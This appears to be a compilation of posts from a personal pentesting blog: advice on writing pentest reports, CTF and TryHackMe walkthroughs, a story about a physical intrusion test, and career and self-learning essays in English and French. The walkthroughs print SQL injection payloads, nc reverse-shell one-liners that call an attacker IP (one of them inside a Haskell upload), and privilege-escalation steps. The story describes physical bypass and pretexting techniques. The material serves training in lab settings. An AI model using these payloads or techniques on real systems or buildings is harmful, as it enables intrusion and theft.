How to write a pentest report

A few month ago i passed the eWPT exam. That is when i realized that doing a pentest report could be hard for people who just broke in to the industry.

This article will try to give some simple steps on how to write a pentest report and important elements that should be in it. It aims to give professionals new to the field some advices on how to write a report for exams or for customers. It can also be used by bug hunters (the vulnerability report part).

This article is small on purpose, i want it to be clear but not too tenuous to read as the process of writing a report can seem scary to newcomers.

Why do we need a report?

A report is the document that will present all your findings and explain to every role of the company you’ve been hired by for the mandate. It will contain the scope previously defined with your customer, high level explainations of the findings and their impact as well as precise technical descriptions of every finding. There are different parts in a report.

The Executive Summary

This is the part where you need to explain for the executive of the company who will read the report. It needs to be high level explainations with no technical details.

It is relevant to add graphs of the findings such as: Vulnerabilities by impact, Attacks by type and Vulnerabilities by cause.

The definitions on Mitre CWE can help you for defining the categories to use in those graphs.

It can comport a global posture on how the findings and attack combinaison could impact your customer’s business.
It can be also useful to include a remediation priority based on your expertise and the prior discussions you had with your customer.

The Vulnerability Report

This is the part where you present each vulnerability you found. I recommend that you order those by severity.

Each vulnerability should have a score that you can calculate using CVSS scores. Here is a calculator. This score takes in account precise metrics to generate a score as close as possible to the impact the vulnerability could have. However, depending on the context of your customer the impact might not be the same, this will be your expertise and the prior conversation that you had with your customer about their business that will help you define the impact for your customer. You don’t need to tamper the CVSS metrics, this is the goal of the remediation priority i mentioned in the previous part.

Here is a way to present it:

  • Severity
  • CVSS score
  • Affected item
  • Description: you have to explain the vulnerability and explain it in the context of your target. For example: « In the context of the support page, some checks were made on the client side, but those checks could be bypassed. »
    Feel free to add resources about the vulnerability
  • Remediation: Here you have to explain how to mitigate the vulnerability. It is always good to add resources from recognized industry standards like OWASP for web pentesting reports.
  • Evidence: Here you need to add proof of the vulnerability. The goal is that the team that will implement the mitigation is able to reproduce the attack. That is why it is important that during the attacking phase you write plenty of notes and take plenty of screens and proofs.

Note: I personaly prefer when each vulnerabilty is presented with the remediation but you can also write a remediation report part right after this.

Useful Resources

Here is a great template done by Andrew Morrison (docx and odt):

  • Pentext is a collection of XML templates, XML schemas and XSLT code, which combined provide an easy way to generate IT security documents including test reports
  • Pentest standards about reporting
  • Radically Open Security provides in their portfolio some reports of project they did. Thoses are good examples.
  • MITRE ATT&CK is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations.
  • CWE is a community-developed list of software and hardware weakness types. It serves as a common language, a measuring stick for security tools, and as a baseline for weakness identification, mitigation, and prevention efforts.
  • OWASP list of vulnerabilities (for web pentesting)
  • Exploit db is a great resource for exploitation
  • National Vulnerability Database by the US CERT

Metasploit Community CTF 2020 – 2 of Spades

Setting up the attacking machine

Access a browser and use Burp or a proxy

I wanted to explain set up details because i really think it is useful for any one who would like to play CTF and access a browser when the connexion to the attacking machine is made through ssh.

So this introduction aims to be userful for any CTF or even daily practice at you job.

You will have to use -D et -C while launching the command

sudo ssh -C -i metasploit_ctf_kali_ssh_key.pem kali@<REMOTE-IP> -D 4444

-D specify the local port you wish to use for forwarding

-C is the Compression

-i to specify the location of the key file 

Then we need to set up burp under the User options tab (it can also be made under Project options, it depends if you wish to keep permanently or just for a specific project).

Then you can configure your browser proxy as it is usually done when you use Burpsuite (note: this picture is of foxyproxy a firefox add on that i would recommend to anyone who happens to work often on webpentest):


For this CTF my team mate CptButtStuff was using proxychains which is an amazing tool to launch a local program.

Here is how to set it up:

Open a new tab and run ssh again as follow using another port than the one you used for burp:

sudo ssh -i metasploit_ctf_kali_ssh_key.pem kali@<REMOTE-IP> -D 5555

Edit the proxychains conf file /etc/proxychains.conf:

socks5 5555

And then you can launch a program you wish using proxychains (here i am using nmap):

proxychains nmap <IP-ADDRESS>

Cool! But how can i get file from the remote host to my local machine?

You can use scp as follow:

scp -i private_key.pem username@remote:/path/to/file /local/dir

The Challenge

Now that we have a set up ready (and not only for this chal 😀 ) we can work on 2 of spades

On port 9001 the service was http (see below the extract of my nmap scan)

9001/tcp open  http        Thin httpd
|_http-server-header: thin

When we browse to this page we get a form:

One of the first thing that comes in mind with a form is sql injection so i tried this, and got a nice error disclosing plenty of info:

' Union select 1, 2 --

This basically means that we need to try to add another col 

And there we go:

Now that we know that the backend DB is sqlite let’s find cool payloads to dump the database:

Table name enumerationSELECT name FROM sqlite_master WHERE type=’table’
Table schema enumerationSELECT sql FROM sqlite_master WHERE type=’table’
Payload chosen

I used this one and got the schema of the table

' Union SELECT null, null, sql FROM sqlite_master WHERE type='table' --

The first line is exactly the one we need so now we can query the information we need to get the flag:

' Union SELECT 1, flag, link from hidden --

And there we have our flag we just need to wget our png file and md5sum it to get the flag:

wget http://<IP>/eGHaMBu2XWvRA5cu/2_of_spades.png
md5sum 2_of_spades.png


All roads lead to Cybersecurity

It has always been difficult for me to get a concrete idea of a job. Especially in the changing world in which we live.

In the 21st century, the importance of transversal skills as meta-skills is becoming apparent. In other words, in the world of cybersecurity, a job may contain different skills needed to be effective in its practice. In cyber professions, whether technical or non-technical, learning how to learn becomes essential to adapt to a rapidly changing environment.

This demand for flexibility encourages observation, evaluation and analysis, while sharing with your peers resources, expertise and vision for protecting citizens’ data and their way of life.

Living in the 21st century disrupts traditional learning through continuous learning, but how to transform information into knowledge?

In this article I will try to answer the questions: What are the different areas of cybersecurity? What skills are needed to work in cybersecurity? What careers are there?

The different areas in Cybersecurity

The careers in Cybersecurity

Which skill for which career?

About degrees and salaries

Cybersecurity being a young field, degrees are not the only rule to get a job, the experience and motivation of the candidate remains what will make the difference for an employer. You can train yourself, pass certifications, engage with cyber security organizations to demonstrate this motivation.

How to get started with pentesting?

When people ask me about how to get into pentesting, the first i say is that practice is essential. But how to practice pentesting on your own? How to get started with virtual machines?

In this article i am going to explain, how to create a virtual attacking machine. With this machine, you will be able to practice on platforms that have « boxes ». Boxes are vulnerable machines that can be hacked. I will then present some of the website you can use for practice.

Practicing this way is very helpful because it is the closest way to understand pentest (it is not realistic but you will get the core techniques used for pentest)

How to get started ?

Create your virtual attacking machine with Kali Linux

  1. Download Virtualbox and install it:  
  2. Download Virtualbox and install it from here  
  3. Download the lastest kali linux virtualbox image (it is going to be our attacker machine) Make sure to take the virtualbox image and not the vmware one:
  1. Install Kali:
  • Go to virtualbox and click on « File » > « Import Appliance… »
  • Click on the yellow folder and navigate to the image of kali you downloaded, select it and click on open
  • Click on next and then click on import. It will take a little while… And then launch it for the first time. Username should be kali and password kali but you can find this info on their website or on the description of your machine in virtualbox
A screenshot of a social media post

Description generated with very high confidence

What website can you use?

Some great starters

First i would recommend to create an account on tryHackMe here, it’s free! Then you will have to download your configuration file and access to the VPN so you can start hacking away on their machines.

What is awesome about tryhackme is that you even have box to learn how to get started on their platform here. This other box will tell you everything about OpenVPN and how to access the boxes. So it will not only be useful on tryhackme but also on other platforms and in your daily practice as a pentester (we do sometimes need a VPN to access our customer system to test).

If you are not familiar with VPN here is a wikipedia article explaining what it is. But simply put you can see a VPN as a tool that will give you access to another computer or environment remotely. TryHackMe and other website for pentesting practice will require a VPN so that you can access your practicing environment, usually a vulnerable machine hack.

If you are not familiar with linux, TryHackMe has a box that explains it very well, you even get a cool badge by completing it! You can also practice on, this website is a wargame you will be able to learn about linux and security concepts. If you want a little more explainations on concepts you should definitely go on linuxjourney.

After this you can have a look at the box on TryHackMe that introduces you to pentesting: basic pentesting.

Here is a list of great box (all free) on tryhackmefor beginners:

There are plenty more i really recommend you to have a look around.

Push your skills further with other platforms

You have covered your beginners skills? You want to go further? Here are some useful resources for this.

Writeup – TryHackMe HaskHell

Today i am going to present the write up for HaskHell on TryHackMe.

First of all after having deployed the machine, we can run nmap on the targeted IP.


nmap -p- -sV

Result of Nmap:

kali@kali:~$ nmap -p- -sV -T4
Starting Nmap 7.80 ( ) at 2020-10-11 11:40 EDT
Nmap scan report for
Host is up (0.23s latency).
Not shown: 65533 closed ports
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
5001/tcp open  http    Gunicorn 19.7.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 1183.25 seconds

We can see that port 5001 is http and open.

Let’s have a look at Port 5001

Go to http://<target-ip>:5001

Homepage of the haskell course

If you click on « homework here » you will find a page with an exercise


The link to submit exercise respond with a 404.
Also the following screen shows us that this teacher has already had hacker’s student


This also gives us a huge hint: We can submit a haskell script and it will be interpreted. So let’s try to make a reverse shell.

But first let’s try to execute a command. Here is the documentation to execute a command with haskell: System Process on haskell

Also we need to find where to upload our script, let’s run dirb


Dirb result
The page where we will submit our shell

Okay, now that we know where to put our script. Let’s write it!

Reverse shell with Haskell

I did not know anything about haskell so after some digging i found out that i had to save my script with .hs in the end for it to be recognized and executed by our target.

Also the text in homework1 specifies: « Your file will be compiled and ran and all output will be piped to a file under the uploads directory. »
This means that we will be able to see our output and errors in order to debug our script if we need (which was really helpful for me)

First i tried a simple ls

#!/bin/env runhaskell
import System.Process

main :: IO ()
main = do
 let stdin' = ""
 (errCode, stdout', stderr') <- readProcessWithExitCode "ls" ["-lar"] stdin'
 putStrLn $ "stdout: " ++ stdout'
 putStrLn $ "stderr: " ++ stderr'
 putStrLn $ "errCode: " ++ show errCode

And i got this:

On we find the following command:

nc -e /bin/sh 1234

So i tried a netcat with the -e option to specify what to do after the nc.
However, there were 2 errors on my case my port 1234 was busy and the netcat command on the target did not handle -e option. Resolving the first error is easy (changed my port to 8888) but not the second one 🙂
So the script that worked for me was the following one:

module Main where 
import System.Process
 main = system "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your-ip> 8888>/tmp/f"

Indeed according to this website, the following command would be handled on the other netcat versions:

#other version of netcat 
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 8888 >/tmp/f

Do not forget before uploading the script to launch you listener on your attacking machine

nc -lvp 8888

And then we get a shell:

And we can get the user flag:

$ ls
$ cat user.txt

Now that we got user we need to get root. But first let’s find to way to avoid having to connect through our webshell. Let’s try to use ssh. If we navigate to the user .ssh folder we have a key pair.
Let’s try to get those on our attacker machine by running python simple http server.

Then from the attacking machine we can connect through ssh after having set up the proper permission for our private key (700)

To have an interactive shell we can run this:

python -c 'import pty; pty.spawn("/bin/bash")'

And there we go:

Linux enumeration with linepeas:

Let’s upload linepeas in our target machine.

On our kali we run


And then we launch python simple server to put it on the target

And from our target we get it with:

$ wget$ chmod 755$ ./

Linepeas is very good but for this context we could have done a sudo -l before and this would have been it. It is a good habit to try this before doing anything else.

Here is what we get if we run flask:

Trying to run flask

Well it is something very useful. We know that we need to write a script and launch it as root. In my case i did a reverse shell but it can be even easier to just launch a shell with a python command.

Here is the reverse shell i did with a script:

#!/usr/bin/env python
import socket,subprocess,os

We then just have to set up a new listener on our attacker machine:

nc -lvp 8888

Se export our script to our env (target machine)

And we run our script as root from the target machine:

We get a shell from our attacking machine. So let’s run our command to get an interactive shell:

python -c 'import pty; pty.spawn("/bin/bash")'

We now have the root flag:

Getting root flag

Code name 23-00 / Nom de code 23-00

Faire défiler le texte pour la version française

This story is largely based on real facts, the names and places have been changed to ensure the anonymity of the characters and entities involved.

One beautiful fall morning, Agent John Durden and I received a mysterious package at the « Beautiful Winter Day » office…

No, our mission does not start with a tape recorder whose tapes burn out at the end of the message.

It starts with a mission order from the Bureau that Agent Effix left on our email inboxes:

« Good morning, Agent Durden and Agent Granville, your mission, if you agree, will be to enter the offices of Sansnom. We must act urgently, Sansnom would like to know if their security system is ready before the unfixable happens. You will have to visit four strategic locations:

The electrical room, the server room, the production room and finally the hardest place to reach the management offices.

If you have no question, this message will self-destruct in a few seconds… or not. »

Excited about our new mission, Agent Durden and I took the first train.

When we arrived at the location, we thought we were in front of a fortress… This imposing building was surrounded by high, sharply pointed gates, its walls were adorned with surveillance cameras, and guards made sure that everyone who entered had a badge to prove their presence.

Also, to make things more difficult for us, any outside person who wanted to enter was escorted to his or her appointment.

This deployment of deterrent security forced us to make our scenarios more complex, but in no way diminished our determination.

In short, only one question occupied our thoughts: How to get in?

We then observed the habits of the local workers. How did they use their badges? Did they sneak into the glass gates in single or multiple groups?

That’s when agent Durden noticed that the glass door reserved for people with reduced mobility had a bottom door large enough to fit through.

We also noted that by a certain time the main security towers were empty, only the scanning cameras were ensuring the security of the building.

Were they operational? We didn’t know.

These small discoveries, our many reconnaissance phases and our multiple scenarios, led us to make an abrupt decision, our eyes concluded: « It will be tonight »…

23-00, dark night, like our camouflages, we were in front of the targeted door waiting for silence around us.

Excitement and apprehension took hold of us, but our determination would guide our entire mission.

Swept away by this mixture of emotions, I suddenly slipped under the narrow doorway.

Joined by my sidekick, we looked at each other for a moment without daring to breathe too deeply, as if we were waiting for something to happen. Nothing happened. In front of us were large staircases.

We went up the first steps and arrived at another staircase, but protected this time.

Undeterred, we went around and found an open door next to it.

So we began our ascent to the various offices in the building.

Our exploration on each floor allowed us to make beautiful discoveries such as blank badges to circulate in the building, precise plans of each room, unlocked mobile phones …

As our research progressed, we were able to find our way around this well-guarded lair which still seemed to selfishly hide some of its mysteries.

In one of the rooms on the third floor, we found temporary access badges, as well as a machine that seemed to be used to print new badges.

Our searches and finds were interrupted by our startle at every sound we thought we heard.

To optimize time, but more importantly to complete our mission, we eventually parted ways.

There, on one of the desks, I found a large booklet containing access codes and instructions for the building’s security systems.

Agent Durden had also made some interesting discoveries, including plans of the building.

Both of us, armed with our valuable information, decided to reach our first target, the management offices. Prior to our mission, I had been able to create a precise profile with information from the management.

When we arrived upstairs, we found that the door security system was much more elaborate than the others, listening only to his courage, Agent Durden began to try to hook the door.

Indeed, agent Durden, always very skilled with his hands, had taken care to forge for us a door-picking equipment that would have made even the greatest locksmiths blush.

While he was testing his new tools, I concentrated on searching for any additional information from the surrounding offices.

Some of the drawers were locked, so the search for their keys intuitively led me to a box containing almost magically the keys to the drawers.

I made interesting discoveries about the schedules of the various members of the management. I made notes and took pictures of everything in case we had to improvise another scenario the next day if we didn’t reach our targets that night.

Officer Durden, who was dealing with a particularly tough door, suggested that I go back down to the third floor offices to pick up a blank badge from the machine we had spotted beforehand, which he hoped would help him with this tedious task.

He didn’t count on a bunch of master keys that he found in a drawer. With these discoveries made, and the master keys tested on a few doors, we took the opportunity of opening the electrical room which we had located, but which we could not open for lack of keys.

Then we went back upstairs to the floor and the offices we had been looking for.

Suddenly as we walked down a corridor we heard the sound of a door slamming very near us, and Officer Durden rushed down a small perpendicular passage which ran along the side of the fully glazed offices and found a dark corner where he crashed against the wall.

Surprised by the urgency of the situation and dazzled by a shower of light on me, I had no choice but to stick to the wall of the passage.

Officer Durden glanced at me, his look distorted by anguish, and then we passed a security guard from behind who miraculously did not turn around and pay no attention to our cleverly concealed presence.

Once the silence came back, which seemed hours later but was only a few seconds, we moved away as quietly and quickly as possible. We resumed our mission at the refractory door to test the passes we had found earlier.

Eureka, it opened, we had reached our first target, which we took pictures of.

We decided to do all the floors we hadn’t done yet in search of our last targets. That’s how we found the server room, however, our master keys didn’t work and the place was even more full of cameras than the rest of the offices.

We spotted a slab in a false floor and discovered that we could lift it to get into the room. We took a picture of it as evidence of a possible bypass of the security system and continued our descent and visit of the top floors.

We paused to study the plans we had found previously and especially the basement plan that intrigued us.

We spotted an area where nothing was indicated and concluded that it was probably another of our most important targets: the production room, which was also our last target, the one that would end our perilous mission.

So we headed there, joyful and carefree of our previous successes, but still discreet. As we descended to the basement we heard a radio noise and finished our descent on velvet steps despite my poor choice of shoes, which had an annoying tendency to squeak on the smooth floor. Once in front of the door of the ultimate room, I opened it carefully while agent Durden took a picture of me saying « the backlight suits you! « which triggered my hilarity and prevented me from immediately seeing the person who was working in this room, which seemed to be a production room indeed.

« What’s going on here? « asked the individual, Agent Durden stammered, « We’re lost”.

Still mixed between the stress of our previous frights and exhilarated by the fact that this room was the end of our mission, I said to our interlocutor:

« My colleague was kind enough to accompany me to retrieve important documents.  » I showed the official envelope that I had retrieved during our visit to the third floor and in which was just some letterhead paper that I had taken in case we had to build future scenarios.

« I had left them in the office, but now we can’t find the exit, where is it please? »

The individual, even more embarrassed than we were, pointed to the security post for the night exit, while a security guard came down and asked us what we were doing here in the middle of the night. We had been in the building for more than five hours. We explained our shameless lies to him again and showed him the temporary badges previously recovered to justify our presence, while joining his colleague.

He asked us more questions and we were forced to give the name of our contact to justify the absence of an escort. The second officer was disconcertingly kind and explained that he was surprised to see us arrive in the basement.

They took our names and our identification papers, and then showed us the gate where we had to badge our way out. So we tried to get through with the temporary badges, which obviously did not allow us to open the glass doors.

So they opened the gates themselves and we were able to leave, relieved and happy about the success of this mission.

After walking a few meters outside, the second officer joined us to collect our temporary badges. « We will provide you with other badges tomorrow, » he apologized, « but we must first clear up this incident which should not have happened.”

We gave him back our badges and were able to leave for the comfort of our homes, with the satisfaction of a mission accomplished and as many emotions as memories in our eyes and hearts.

Cette histoire est largement inspirée de faits réels, les noms et les endroits ont été changés afin de garantir l’anonymat des personnages, et entités concernés.

Un beau matin d’automne, l’agent John Durden et moi-même avons reçu aux bureaux de « Belle journée d’hiver » un mystérieux colis… 

Non, notre mission ne commence pas avec un magnétophone dont les bandes se consument à la fin du message.

Mais bien par un ordre de mission de l’agent Effix du Bureau, laissé sur nos boîtes courriel :

« Bon matin agent Durden et agent Granville, votre mission si vous l’acceptez sera de vous introduire dans les bureaux de Sansnom. Il faut agir de toute urgence, Sansnom souhaiterait savoir si leur système de sécurité est au point avant que l’irréparable ne se produise. Vous allez devoir y visiter quatre endroits stratégiques:

La salle électrique, la salle des serveurs, la salle de production et enfin l’endroit le plus difficile à atteindre les bureaux de la direction.

Si vous n’avez pas de questions, ce message s’autodétruira dans quelques secondes … ou pas»

Excités de notre nouvelle mission, l’agent Durden et moi-même partîmes d’un pas décidé et prîmes le premier train.

À notre arrivée, sur le lieu-dit, nous nous crûmes devant une forteresse. Cette bâtisse imposante était encerclée de hautes grilles aux bouts très pointus, ses murs étaient ornés de caméras de surveillance et des gardes veillaient à ce que chaque personne qui y entrait ait un badge qui justifiait de sa présence. 

Aussi, pour nous compliquer la tâche, toute personne extérieure qui souhaitait y rentrer était escortée à son rendez-vous. 

Ce déploiement de sécurité dissuasive nous obligea à complexifier nos scénarios, mais n’entama en rien notre détermination. 

Une seule question, en somme, occupait nos pensées : Par où rentrer ? 

Nous observâmes alors les habitudes des travailleurs du lieu. Comment utilisaient-ils leur badge ? Se faufilaient-ils à un ou à plusieurs dans les portiques de verres ? 

C’est à ce moment-là que l’agent Durden remarqua que la porte de verre réservée aux personnes à mobilité réduite avait un bas de porte assez grand pour s’y faufiler. 

Nous notâmes également, qu’à partir d’une certaine heure, les tourelles principales étaient vides, seul le balayage des caméras veillait à la sécurité du bâtiment.

Étaient-elles opérationnelles ? Nous n’en savions rien.

Ces minces trouvailles, nos nombreuses phases de reconnaissances et nos multiples scénarios, nous amenâmes à prendre une décision abrupte, nos regards conclurent: « ça sera ce soir »

23-00, nuit noire, comme nos camouflages, nous étions devant la porte ciblée à attendre que le silence se fasse autour de nous.

L’excitation et l’appréhension s’emparèrent alors de nous, mais notre détermination guiderait toute notre mission.

Emportée par ce mélange d’émotions, je me glissais brusquement sous le bas de porte étroit. 

Rejointe par mon acolyte, nous nous regardâmes un instant sans oser respirer trop fort comme si nous attendions que quelque chose se produise. Rien ne se passa. Devant nous se trouvaient de grands escaliers.

Nous montâmes les premières marches et arrivâmes devant un autre escalier, mais protégé cette fois-ci. 

Sans nous décourager, nous fîmes le tour et finîmes par trouver une porte ouverte juste à côté. 

C’est ainsi que nous commençâmes notre ascension vers les différents bureaux du bâtiment.

Notre exploration à chaque étage nous permit de faire de belles trouvailles comme des badges vierges pour circuler dans le bâtiment, des plans précis de chaque salle, des téléphones portables non verrouillés …

Au fur et à mesure de nos recherches, nous nous repérions un peu mieux au sein de cet antre bien gardé qui semblait encore cacher égoïstement quelques-uns de ses mystères.

Dans une des salles du troisième étage, nous trouvâmes des badges d’accès temporaires, ainsi qu’une machine qui semblait servir à imprimer de nouveaux badges. 

Nos recherches et trouvailles connaissaient des intermèdes de sursaut à chaque bruit que l’on croyait entendre.

Pour optimiser le temps, mais surtout pour mener à bien notre mission, nous finîmes par nous séparer.

C’est là que sur un des bureaux, je trouvais un grand livret contenant des codes d’accès et des modes d’emploi des systèmes de sécurité du bâtiment. 

De son côté, l’agent Durden avait également fait de belles trouvailles dont des plans du bâtiment.

Tous deux, forts de nos précieuses informations, nous décidâmes de viser notre première cible, les bureaux de la direction. En amont de notre mission, j’avais pu créer un profil précis avec les informations de la Direction. 

Arrivés à l’étage, nous constatâmes que le système de sécurité des portes était bien plus élaboré que les autres, n’écoutant que son courage l’agent Durden commença à essayer de crocheter la porte.

En effet, l’agent Durden toujours très habile de ses mains avait pris soin de nous forger un matériel de crochetage de porte qui aurait fait rougir les plus grands serruriers.

Pendant qu’il testait ses nouveaux outils, je me concentrais à glaner toutes informations supplémentaires dans les bureaux des alentours. 

Certains tiroirs étaient fermés à clé, la quête de ces clés m’amena intuitivement vers une boîte renfermant presque par « Magie » les clés des tiroirs.

Je fis d’intéressantes découvertes sur l’emploi du temps des divers membres de la direction. Je pris tout en note et en photo pour le cas où nous devions improviser un autre scénario le lendemain si jamais nous n’atteignons pas nos cibles cette nuit.

L’agent Durden ayant à faire à une porte particulièrement coriace, me proposa de redescendre explorer les bureaux du troisième étage afin de prendre un badge vierge de la machine que nous avions repérée au préalable qui, espérait-il, l’aiderait dans cette fastidieuse tâche. 

C’était sans compter sur un trousseau de passe-partout qu’il trouva dans un tiroir. Ces découvertes faites, et le trousseau testé sur quelques portes, nous en profitâmes pour ouvrir la salle électrique que nous avions repérée, mais que nous ne pouvions ouvrir faute de clés.

Nous remontâmes ensuite vers l’étage et les bureaux tant convoités.

Tout à coup alors que nous marchions dans un couloir, nous entendîmes le bruit d’un claquement de porte tout près de nous, l’agent Durden se précipita dans un petit passage perpendiculaire qui longeait des bureaux entièrement vitrés et trouva un coin sombre où il s’écrasa contre le mur. 

Surprise par l’urgence de la situation et éblouie par une douche de lumière sur moi, je n’eus d’autre choix que de me coller au mur du passage. 

L’agent Durden me lança un regard déformé par l’angoisse, puis nous vîmes passer un agent de sécurité de dos qui par miracle ne se retourna pas et ne fit pas attention à nos présences si intelligemment dissimulées. 

Une fois les bruits de pas éloignés, ce qui sembla des heures plus tard, mais ne fut que quelques secondes seulement, nous nous éloignâmes le plus discrètement et le plus rapidement possible. Nous reprîmes notre mission au niveau de la porte réfractaire pour tester les passes que nous avions trouvés précédemment.

Eurêka, elle s’ouvrit, nous avions atteint notre première cible que nous prîmes en photos.

Nous décidâmes de faire tous les étages que nous n’avions pas encore faits à la recherche de nos dernières cibles. C’est ainsi que nous trouvâmes la salle des serveurs toutefois, notre trousseau ne fonctionnait pas et l’endroit était encore plus truffé de caméras que le reste des bureaux. 

Nous repérâmes une dalle dans un faux sol et découvrîmes que nous pouvions la soulever pour nous introduire dans la salle. Nous la prîmes donc en photo en guise de preuve de bypass possible du système de sécurité et continuâmes notre descente et visite des derniers étages.

Nous fîmes une pause pour étudier les plans trouvés précédemment et particulièrement celui du sous-sol qui nous intriguait. 

Nous repérâmes un espace où rien n’était indiqué et nous conclûmes qu’il s’agissait probablement d’une autre de nos cibles les plus importantes : la salle de production, qui était aussi notre dernière cible, celle qui clôturerait notre mission périlleuse.

Nous nous dirigeâmes donc vers cet endroit, joyeux et insouciants de nos précédents succès, mais tout de même encore discret. Au moment de descendre vers le sous-sol nous entendîmes un bruit de radio et finîmes notre descente à pas de velours malgré mon mauvais choix de chaussures qui avaient une fâcheuse tendance à grincer sur le sol lisse. Arrivés devant la porte de la fameuse salle je l’ouvris avec précaution tandis que l’agent Durden me prit en photo en me lançant un « le contre-jour te va à ravir! » ce qui déclencha mon hilarité et m’empêcha de voir tout de suite la personne qui travaillait dans cette salle qui semblait être en effet, une salle de production.

« – Qu’est-ce qu’il se passe? » demanda l’individu, l’agent Durden bredouilla : « Nous sommes perdus ».

Encore mélangée entre le stress de nos frayeurs précédentes et grisés par le fait que cette salle clôturait notre mission je dis à notre interlocuteur :

« Mon collègue a eu la gentillesse de m’accompagner pour récupérer des documents importants ». Je montrais l’enveloppe officielle que j’avais récupérée lors de notre visite du troisième étage et dans laquelle se trouvait juste du papier à entête que j’avais pris pour le cas où nous devions construire des scénarios ultérieurs.

« Je les avais oubliés au bureau, mais maintenant nous ne trouvons plus la sortie, où est-ce s’il vous plait? »

L’individu, encore plus gêné que nous, nous indiqua le poste de sécurité de la sortie de nuit, tandis qu’un agent de sécurité descendit et nous demanda ce que nous faisions ici en pleine nuit. Nous avions, en effet, passé plus de cinq heures dans le bâtiment. Nous lui expliquâmes à nouveau nos mensonges éhontés et lui montrâmes les badges temporaires récupérés précédemment pour justifier notre présence, tout en rejoignant son collègue. Il nous posa davantage de questions et nous fûmes obligés de donner le nom de notre contact pour justifier l’absence d’une escorte. Le deuxième agent, d’une gentillesse déconcertante, nous expliqua avoir été étonné de nous voir arriver au sous-sol.

Ils prirent nos noms et nos papiers d’identité, puis nous indiquèrent le portique où nous devions badger pour sortir. Nous tentâmes donc de passer les badges temporaires qui évidemment ne nous permirent pas d’ouvrir les portes vitrées. 

Ils ouvrirent donc eux-mêmes les portiques et nous pûmes sortir, soulagés et heureux de la réussite de cette mission. 

Après avoir marché quelques mètres dehors, le deuxième agent nous rejoint pour récupérer nos badges temporaires, « nous vous en fournirons d’autres demain, s’excusa-t-il, mais nous devons d’abord tirer au clair cet incident qui n’aurait pas dû se produire »

Nous lui rendîmes nos badges et pûmes partir retrouver le confort de nos foyers, avec la satisfaction d’une mission accomplie et autant d’émotions que de souvenirs dans nos yeux.

Tableau de compétences acquises n°1

Le défi de devenir spécialiste des tests d’intrusion par l’auto-apprentissage a été une aventure riche et variée. Aujourd’hui, avec un peu plus de recul, il me semble important de faire une analyse des compétences que j’ai pu développer et acquérir tout au long de mon processus d’apprentissage. Dans l’article précédent, je rappelais les étapes de mon auto-formation et la manière dont j’ai atteint mon objectif final. Dans cet article, je présente une grille de compétences que j’ai développées lors de la réalisation de mon blogue et de mes balados.


Compétences spécifiquesCompétences non techniques et transversales
Maitrise d’un CMSCapacité rédactionnelle
Maitrise et gestion d’un référencementMaitrise enjeux du web
Gestion des réseaux sociaux et animation de la communautéAptitude à communiquer
Création d’un flux RSS veille automatiqueGérer une communauté
Mieux se connaître
Savoir parler de soi
Augmenter sa confiance en soi
Grille de compétences relatives à la réalisation d’un blog


Compétences spécifiquesCompétences non techniques et transversales
Maitriser du matériel d’enregistrementAméliorer ses compétences en communication
Maitriser l’art de la diffusion sur les réseaux sociauxGagner en confiance
Maitriser un logiciel de montage comme AudacityDévelopper un ton professionnel
Éditer sur une plateforme de diffusion (Soundcloud, Apple podcasts)Être à l’écoute
Créer un logoFaire découvrir des personnalités à sa communauté
Choisir d’un jingle dans une bibliothèque libre de droit et gratuiteDévelopper son réseau
Élargir sa visibilité et sa communauté
Augmenter le trafic sur le blog
Rechercher des invité.e.s inspirant.e.s
Créer une grille de questions adaptée à chaque invité.
Grille de compétences relatives aux balados

Comment s’auto former en cybersécurité? How to train yourself in cybersecurity?

Scroll down for english

L’apprenance au coeur de la cybersécurité

La période que nous vivons où les compétences d’hier ne sont plus les compétences d’aujourd’hui, demande à chacun d’entre nous de nous adapter à cette société de la connaissance mouvante et incertaine.

Apprendre au 21e siècle offre un champ des possibles illimité grâce à la large palette des ressources disponibles sur Internet.

Ce constat m’a amenée à m’interroger quant à la réalisation de mon projet: devenir pentesteuse en auto-formation. Et à répondre au fil de l’eau aux questions qui se sont imposées lors de ce challenge.

Avant de commencer mon challenge il a été nécessaire de mieux me connaitre pour atteindre mon objectif. Et me poser différentes questions.

1- Quel profil apprenant me permet d’apprendre durablement? 

En faisant des tests en ligne pour définir son profil apprenant. Vous trouverez ici différents tests pour vous aider à mieux vous connaître en tant qu’apprenant.

Ensuite, face à une pléthore de documents en ligne et afin d’orienter mes recherches documentaires vers des sources fiables, se former à la recherche documentaire est essentiel dans ce projet.

2- Comment faire une recherche et veille documentaire méthodique et rigoureuse en se basant sur des sources fiables?

Sans détour, suivre une formation comme celle ci est primordial.

Personnaliser un programme éducatif adapté à ses besoins ses points forts et ses faiblesses influence significativement la motivation et l’efficacité.

3- Comment construire un programme de formation individualisé?

En appliquant les suggestions relevées dans la question 1. Et en utilisant la méthodologie de recherche documentaire pour construire un curriculum adapté au métier visé.

Lors d’une démarche de formation, il peut arriver d’avoir des moments de découragements.

4-Comment rester motivée durant l’auto formation?

Afin de rester motivé, il est utile de découper l’objectif en plusieurs sous objectifs. Aussi, alterner entre les apprentissages formels, informels et professionnels permet d’éviter la lassitude. Il ne faut pas hésiter à demander de l’aide et échanger avec ses proches ou les professionnels de la cyber. Enfin, il faut bien garder en tête l’objectif et les conséquences positives qui en découleront dans l’avenir.

Le challenge qui m’a amenée à m’autoformer, m’a donner envie de partager cette expérience.

5- Comment partager son expérience d’apprenance?

En documentant sa démarche avec des supports média comme un blog des podcasts etc.

Il arrive parfois, que malgré toutes les précautions prises lors de la construction de la formation, certaines compétences nous manquent. Toutefois, des projets annexes peuvent combler ces manques et nous ouvrir vers d’autres sujets.

6- Comment combler des compétences non acquises durant l’auto-formation?

En créant des sous projets qui laissent libre cours à votre imagination. Pour ma part j’ai créé des podcasts qui m’ont incités à améliorer mes compétences en communication.

Un projet en auto-formation nous met face à nous même et parfois cette situation exacerbe la solitude.

7- Comment faire face à la solitude pendant le projet?

En s’investissant dans des associations en cybersécurité de son choix et en n’hésitant pas à solliciter des professionnels pour un conseil ou un avis.

Lifelong learning at the heart of Cybersecurity

